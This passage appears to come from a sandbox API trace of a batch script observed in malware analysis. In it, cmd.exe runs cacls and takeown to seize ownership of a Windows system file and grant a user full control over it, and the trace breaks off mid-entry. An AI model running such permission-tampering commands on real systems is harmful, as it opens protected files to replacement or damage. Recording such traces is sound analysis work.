lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df0f8*=0x2) returned 1 [0243.953] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0243.953] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.953] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3df108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0243.953] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3df108 | out: _Buffer=">") returned 1 [0243.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.953] GetFileType (hFile=0x7) returned 0x2 [0243.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0d0 | out: lpMode=0x3df0d0) returned 1 [0243.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.954] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3df0fc*=0x26) returned 1 [0243.956] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.956] GetFileType (hFile=0x7) returned 0x2 [0243.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.956] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df354 | out: lpMode=0x3df354) returned 1 [0243.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7412a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3df380, lpReserved=0x0 | out: lpBuffer=0x7412a8*, lpNumberOfCharsWritten=0x3df380*=0x5) returned 1 [0243.957] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df38c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 91 [0243.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.957] GetFileType (hFile=0x7) returned 0x2 [0243.958] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.958] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0243.958] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.958] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x5b) returned 1 [0243.959] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df3ac | out: _Buffer="\r\n") returned 2 [0243.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.959] GetFileType (hFile=0x7) returned 0x2 [0243.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0243.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df36c | out: lpMode=0x3df36c) returned 1 [0243.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df398*=0x2) returned 1 [0243.961] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0243.961] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0243.961] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0243.961] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0243.961] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0243.961] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0243.961] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0243.961] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0243.961] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0243.961] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0243.961] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0243.961] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0243.961] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0243.961] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0243.961] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0243.961] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0243.961] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0243.961] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0243.961] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0243.962] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0243.962] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0243.962] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0243.962] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0243.962] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0243.962] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0243.962] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0243.962] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0243.962] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0243.962] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0243.962] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0243.962] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0243.962] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0243.962] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0243.962] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0243.962] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0243.962] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0243.962] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0243.962] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0243.963] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0243.963] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0243.963] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0243.963] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0243.963] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0243.963] GetProcessHeap () returned 0x740000 [0243.963] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x418) returned 0x756248 [0243.963] SetErrorMode (uMode=0x0) returned 0x0 [0243.963] SetErrorMode (uMode=0x1) returned 0x0 [0243.964] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x756250, lpFilePart=0x3df150 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df150*="Desktop") returned 0x25 [0243.964] SetErrorMode (uMode=0x0) returned 0x1 [0243.964] GetProcessHeap () returned 0x740000 [0243.964] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x756248, Size=0x60) returned 0x756248 [0243.964] GetProcessHeap () returned 0x740000 [0243.964] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x756248) returned 0x60 [0243.964] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.964] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0243.964] GetProcessHeap () returned 0x740000 [0243.964] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x120) returned 0x7562b0 [0243.964] GetProcessHeap () returned 0x740000 [0243.964] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x238) returned 0x7563d8 [0243.968] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.968] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0243.969] GetLastError () returned 0x2 [0243.969] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0243.969] GetLastError () returned 0x2 [0243.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0x756588 [0243.970] GetProcessHeap () returned 0x740000 [0243.970] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x7555d8, Size=0x4) returned 0x7555d8 [0243.970] FindClose (in: hFindFile=0x756588 | out: hFindFile=0x756588) returned 1 [0243.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0xffffffff [0243.970] GetLastError () returned 0x2 [0243.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x3deecc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3deecc) returned 0x756588 [0243.971] FindClose (in: hFindFile=0x756588 | out: hFindFile=0x756588) returned 1 [0243.971] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0243.971] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0243.971] GetConsoleTitleW (in: lpConsoleTitle=0x3def1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.972] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x756880, lpFilePart=0x3dea3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3dea3c*="Desktop") returned 0x25 [0243.972] SetErrorMode (uMode=0x0) returned 0x1 [0243.972] GetProcessHeap () returned 0x740000 [0243.973] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x756878, Size=0x60) returned 0x756878 [0243.973] GetProcessHeap () returned 0x740000 [0243.973] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x756878) returned 0x60 [0243.973] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.973] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0243.973] GetProcessHeap () returned 0x740000 [0243.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x120) returned 0x7568e0 [0243.973] GetProcessHeap () returned 0x740000 [0243.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x238) returned 0x756a08 [0243.973] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.974] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0243.974] GetLastError () returned 0x2 [0243.974] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0243.974] GetLastError () returned 0x2 [0243.974] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0243.975] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0x756bb8 [0243.975] FindClose (in: hFindFile=0x756bb8 | out: hFindFile=0x756bb8) returned 1 [0243.975] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0xffffffff [0243.975] GetLastError () returned 0x2 [0243.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x3de7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3de7b8) returned 0x756bb8 [0243.976] FindClose (in: hFindFile=0x756bb8 | out: hFindFile=0x756bb8) returned 1 [0243.976] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0243.976] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0243.976] GetConsoleTitleW (in: lpConsoleTitle=0x3decb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0243.976] InitializeProcThreadAttributeList (in: lpAttributeList=0x3deb38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3dec00 | out: lpAttributeList=0x3deb38, lpSize=0x3dec00) returned 1 [0243.976] UpdateProcThreadAttribute (in: lpAttributeList=0x3deb38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3debf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3deb38, lpPreviousValue=0x0) returned 1 [0243.977] GetStartupInfoW (in: lpStartupInfo=0x3deaf4 | out: lpStartupInfo=0x3deaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0243.977] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0243.979] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3deb94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3debe0 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x3debe0*(hProcess=0x74, hThread=0x78, dwProcessId=0x320, dwThreadId=0xac4)) returned 1 [0243.997] CloseHandle (hObject=0x78) returned 1 [0243.997] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0243.997] GetProcessHeap () returned 0x740000 [0243.997] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757f38 | out: hHeap=0x740000) returned 1 [0243.997] GetEnvironmentStringsW () returned 0x757f38* [0243.998] GetProcessHeap () returned 0x740000 [0243.998] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb36) returned 0x758a78 [0243.998] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0243.998] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0246.376] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3dead4 | out: lpExitCode=0x3dead4*=0x1f57) returned 1 [0246.377] CloseHandle (hObject=0x74) returned 1 [0246.377] _vsnwprintf (in: _Buffer=0x3dec1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3deae0 | out: _Buffer="00001F57") returned 8 [0246.377] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0246.377] GetProcessHeap () returned 0x740000 [0246.377] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758a78 | out: hHeap=0x740000) returned 1 [0246.377] GetEnvironmentStringsW () returned 0x757f38* [0246.377] GetProcessHeap () returned 0x740000 [0246.377] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb5c) returned 0x75a120 [0246.377] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0246.377] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0246.377] GetProcessHeap () returned 0x740000 [0246.377] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a120 | out: hHeap=0x740000) returned 1 [0246.377] GetEnvironmentStringsW () returned 0x757f38* [0246.377] GetProcessHeap () returned 0x740000 [0246.377] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb5c) returned 0x75a120 [0246.377] FreeEnvironmentStringsW (penv=0x757f38) returned 1 [0246.378] GetProcessHeap () returned 0x740000 [0246.378] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740db8 | out: hHeap=0x740000) returned 1 [0246.378] DeleteProcThreadAttributeList (in: lpAttributeList=0x3deb38 | out: lpAttributeList=0x3deb38) [0246.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.378] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0246.378] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.378] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0246.379] _get_osfhandle (_FileHandle=0) returned 0x3 [0246.379] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0246.379] SetConsoleInputExeNameW () returned 0x1 [0246.379] GetConsoleOutputCP () returned 0x1b5 [0246.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0246.379] SetThreadUILanguage (LangId=0x0) returned 0x409 [0246.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df354, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0246.380] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0246.380] _get_osfhandle (_FileHandle=3) returned 0x74 [0246.380] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0246.380] GetProcessHeap () returned 0x740000 [0246.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756b38 | out: hHeap=0x740000) returned 1 [0246.380] GetProcessHeap () returned 0x740000 [0246.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756a08 | out: hHeap=0x740000) returned 1 [0246.380] GetProcessHeap () returned 0x740000 [0246.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7568e0 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756878 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7567a0 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756588 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756508 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7563d8 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562b0 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756248 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756180 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7412a0 | out: hHeap=0x740000) returned 1 [0246.381] GetProcessHeap () returned 0x740000 [0246.381] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x741240 | out: hHeap=0x740000) returned 1 [0246.381] _get_osfhandle (_FileHandle=3) returned 0x74 [0246.381] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0246.381] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df338, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df338*=0xc2, lpOverlapped=0x0) returned 1 [0246.382] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0246.382] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0246.383] _get_osfhandle (_FileHandle=3) returned 0x74 [0246.383] GetFileType (hFile=0x74) returned 0x1 [0246.383] _get_osfhandle (_FileHandle=3) returned 0x74 [0246.383] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0246.383] GetProcessHeap () returned 0x740000 [0246.384] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x764ab0 [0246.384] GetProcessHeap () returned 0x740000 [0246.384] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764ab0 | out: hHeap=0x740000) returned 1 [0246.387] _tell (_FileHandle=3) returned 47 [0246.387] _close (_FileHandle=3) returned 0 [0246.387] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df10c | out: _Buffer="\r\n") returned 2 [0246.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.387] GetFileType (hFile=0x7) returned 0x2 [0246.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0246.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0cc | out: lpMode=0x3df0cc) returned 1 [0246.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df0f8*=0x2) returned 1 [0246.390] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0246.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0246.390] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3df108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0246.391] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3df108 | out: _Buffer=">") returned 1 [0246.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.391] GetFileType (hFile=0x7) returned 0x2 [0246.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0246.391] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0d0 | out: lpMode=0x3df0d0) returned 1 [0246.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3df0fc*=0x26) returned 1 [0246.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.392] GetFileType (hFile=0x7) returned 0x2 [0246.392] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0246.392] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df354 | out: lpMode=0x3df354) returned 1 [0246.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7412a8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3df380, lpReserved=0x0 | out: lpBuffer=0x7412a8*, lpNumberOfCharsWritten=0x3df380*=0x7) returned 1 [0246.393] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df38c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" ") returned 62 [0246.393] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.393] GetFileType (hFile=0x7) returned 0x2 [0246.393] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0246.394] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0246.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.394] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x3e) returned 1 [0246.396] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df3ac | out: _Buffer="\r\n") returned 2 [0246.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.396] GetFileType (hFile=0x7) returned 0x2 [0246.396] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0246.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df36c | out: lpMode=0x3df36c) returned 1 [0246.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0246.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df398*=0x2) returned 1 [0246.398] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0246.398] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0246.399] _wcsicmp (_String1="takeown", 